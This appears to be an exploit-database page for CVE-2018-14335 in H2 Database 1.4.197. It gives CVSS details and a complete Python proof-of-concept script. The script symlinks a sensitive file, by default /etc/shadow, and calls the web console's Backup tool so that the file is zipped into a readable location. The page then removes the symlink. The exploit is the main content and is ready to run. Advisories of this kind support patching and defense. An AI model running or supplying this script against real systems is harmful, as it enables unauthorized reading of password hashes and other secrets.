H2 Database 1.4.197 Information Disclosure

2018.07.30
Credit: owodelta
Risk: Low
Local: No
Remote: Yes
CWE: CWE-275


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: H2 Database 1.4.197 - Information Disclosure # Date: 2018-07-16 # Exploit Author: owodelta # Vendor Homepage: www.h2database.com # Software Link: http://www.h2database.com/html/download.html # Version: all versions # Tested on: Linux # CVE : CVE-2018-14335 # Description: Insecure handling of permissions in the backup function allows # attackers to read sensitive files (outside of their permissions) via a # symlink to a fake database file. # PS, thanks to HTB and our team FallenAngels #!/usr/bin/python import requests import argparse import os import random def cleanup(wdir): cmd = "rm {}symlink.trace.db".format(wdir) os.system(cmd) def create_symlink(file, wdir): cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir) os.system(cmd) def trigger_symlink(host, wdir): outputName = str(random.randint(1000,10000))+".zip" #get cookie url = 'http://{}'.format(host) r = requests.get(url) path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do') url = '{}/{}'.format(url,path) payload = { "tool":"Backup", "args":"-file,"+wdir+outputName+",-dir,"+wdir} #print url requests.post(url,data=payload).text print "File is zipped in: "+wdir+outputName if __name__ == "__main__": parser = argparse.ArgumentParser() required = parser.add_argument_group('required arguments') required.add_argument("-H", "--host", metavar='127.0.0.1:8082', help="Target host", required=True) required.add_argument("-D", "--dir", metavar="/tmp/", default="/tmp/", help="Writable directory") required.add_argument("-F", "--file", metavar="/etc/shadow", default="/etc/shadow", help="Desired file to read",) args = parser.parse_args() create_symlink(args.file,args.dir) trigger_symlink(args.host,args.dir) cleanup(args.dir)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top